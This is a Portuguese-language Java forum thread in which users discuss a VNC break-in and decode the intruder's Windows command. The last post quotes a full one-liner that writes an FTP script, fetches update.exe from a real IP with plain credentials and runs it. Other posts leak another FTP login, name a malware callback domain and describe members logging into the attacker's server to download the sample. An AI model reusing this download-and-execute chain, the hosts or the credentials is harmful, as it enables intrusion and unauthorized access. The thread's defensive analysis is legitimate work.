VNC Server, invasão.

JavaChild Membro desde: 23/12/2008 07:01:02 Mensagens: 135 Offline

Bom dia,

Meu ip externo em casa ficou aberto e um espertinho entrou em meu VNC Server - e logo no executar do windows ele digitou:

Logo após isso, entrou no arquivos de programas e... fechei a sua conexão.

Alguem sabe o que ele gostaria de fazer com este comando ? abrir um Ftp para copiar dados?

Att.

Virtual Machine Man Membro desde: 18/09/2006 10:05:46 Mensagens: 609 Offline

Caramba, que furo de segurança aí em casa.
Por isso que uso meu próprio programa de acesso remoto o Satan-AnyWhere.
Pelo que deu para mim entender, ele deve ter trocado (ou pelo menos tentado trocar) seu arquivo "winupdate.exe" por um arquivo "winupdate.exe" baixado por FTP de algum lugar (pode ser de algum lugar de controle dele), legal esse carinha não?
Se bem que pode ser até bot de VNC...

Inté.

JavaGuru Membro desde: 01/09/2008 13:20:12 Mensagens: 233 Offline

repara aki:

ik &echo bye >>

e aki:

&del ik &winupdate.exe&exit

JavaChild Membro desde: 23/12/2008 07:01:02 Mensagens: 135 Offline

Poisé, que cara legal né!

Olhando novamente o comando poderia ser isso.

Verifica-lo ei!

Moderador Membro desde: 29/07/2004 16:10:13 Mensagens: 17543 Offline

Ele fez um ftp e a seguir executou o comando malicioso "winupdate.exe", que obviamente não faz um update do Windows e sim deve fazer alguma m*** %%*(*(*&&&.
Use a técnica Bill Gates de lidar com problemas de segurança - format + reinstall, e depois a técnica que deixa sua máquina mais segura possível: deixe a máquina fora de qualquer rede.
Ou então rode o seu melhor anti-vírus, anti-spyware etc. e veja se não houve alguma contaminação conhecida.

This message was edited 1 time. Last update was at 18/02/2009 10:18:25

Michel_Sancovich wrote:repara aki:

ik &echo bye >>

e aki:

&del ik &winupdate.exe&exit

O "bye" seria enviado via pipes para a entrada padrao do programa de ftp que vem junto com o windows.
O "del" estaria detonando algum arquivo.
O "exit" sairia do console.
O "&" no caso do windows pelo menos se não me engano serve para encadear comandos.
O ">>" faz o pipe.
O "ik" por enquanto não sei bem o que faz.

Inté.

Se ele executou os comandos, cuidado com suas senhas de email, banco etc.

Moderador Membro desde: 29/07/2004 16:10:13 Mensagens: 17543 Offline

O arquivo "ik" só está no script porque o fulano de tal que escreveu o script não conhece o "nul" (também conhecido como "lata de lixo de bits").
Você viu que o carinha criou um arquivo "ik" só para não mostrar nada na tela, e depois o apagou.

GUJ Master Membro desde: 23/10/2008 06:39:07 Mensagens: 1092 Offline

No FTP do carinha tem até umas coisas.

Tô baixando um arquivo aqui de 16mb p/ ver o que é...

[]'s

JavaChild Membro desde: 23/12/2008 07:01:02 Mensagens: 135 Offline

AUser wrote:No FTP do carinha tem até umas coisas.

Tô baixando um arquivo aqui de 16mb p/ ver o que é...

[]'s

Você conseguiu entrar no FTP do cara? depois me da um retorno do que conseguir! Peguei o tracert do espertinho..

Bó, por essa eu não esperava!
Obrigado pela explicação de todos...

JavaBaby Membro desde: 09/12/2008 07:21:17 Mensagens: 87 Offline

Isso me lembrou de um episódio onde eu estudo, lá usam tudo windows. Colocaram logins para os alunos, com poucas permissões... não dá pra instalar aplicativos ou modificar qualquer coisa do sistema, mas os virus e worms têm acesso garantido, transitam livremente.

Matheus Leandro Ferreira wrote:

AUser wrote:No FTP do carinha tem até umas coisas.

Tô baixando um arquivo aqui de 16mb p/ ver o que é...

[]'s

Você conseguiu entrar no FTP do cara? depois me da um retorno do que conseguir! Peguei o tracert do espertinho..

Bó, por essa eu não esperava!
Obrigado pela explicação de todos...

No comando que ele digitou, tem o usuario e senha: celltronicacombr

.. Veja bem: a maquina não é dele, e sim de uma empresa que ele conseguiu acesso! dessa celltronica aí.
Eu recomendo que não entrem. Vacilo seu de colocar isso publico aqui.

Perceba que ele colocou no diretorio tmp, que deve dar permissoes para ele colocar arquivos lá.
Provavelmente ele não é root na maquina, apenas pegou o ftp (que usuario e senha ridiculos, convenhamos) ou conseguiu shell.

O suposto arquivo "do mal" winupdate.exe está em maildir/tmp , o resto deve ser coisa da empresa

Falou

Moderador Membro desde: 23/12/2006 21:05:04 Mensagens: 3083 Offline

Oi,

Maninho!! como você deixou isso acontecer.... roda um antivirus e tire o cabo de rede. diz pro pai e pra mãe não entrarem nos e-mails etc..

Analisei o comando, olhe bem:

Relembrando o tempo ms-dos

Entrei no FTP também e baixei esse arquivo, o mesmo foi detectado como virus!

Tchauzin! fica bem =*

This message was edited 1 time. Last update was at 18/02/2009 15:56:38

acabei de baixar esse arquivo no ubuntu e rodei um strings nele.

uma hora ele conecta no 'updatemicrosoft.no-ip.info', aparentemente

E tem esse trecho:

Sem falar no temivel

Tem uma lista de palavras q parecem ser senhas comuns (como texas, Texas, kool, 123) e uma lista de programas .exe comuns como notepad.exe -- enfim é coisa do capeta.

Humm... parece que o virus ja foi removido

Thread.start() Membro desde: 05/06/2011 12:58:29 Mensagens: 41 Offline

Galera, de vez em quando deixo meu pc ligado e o vnc server tb, pq as vezes preciso acessar minha maquina de outros lugares..

porem hj fui no menu > iniciar > executar e tinha esse comando:

cmd /c echo open 201.120.57.137 21 >> ik &echo user oracle oracle >> ik &echo binary >> ik &echo get update.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &update.exe &exit

sei que terei que formata e pc, o pc ja tava precisando, mas serve pra gente ver que proteção nunca é d+, anti virus ativado, firewall, senha no pc, e msm assim parece q passar por isso foi mamão com açucar...

Notícias, artigos e o maior fórum brasileiro sobre Java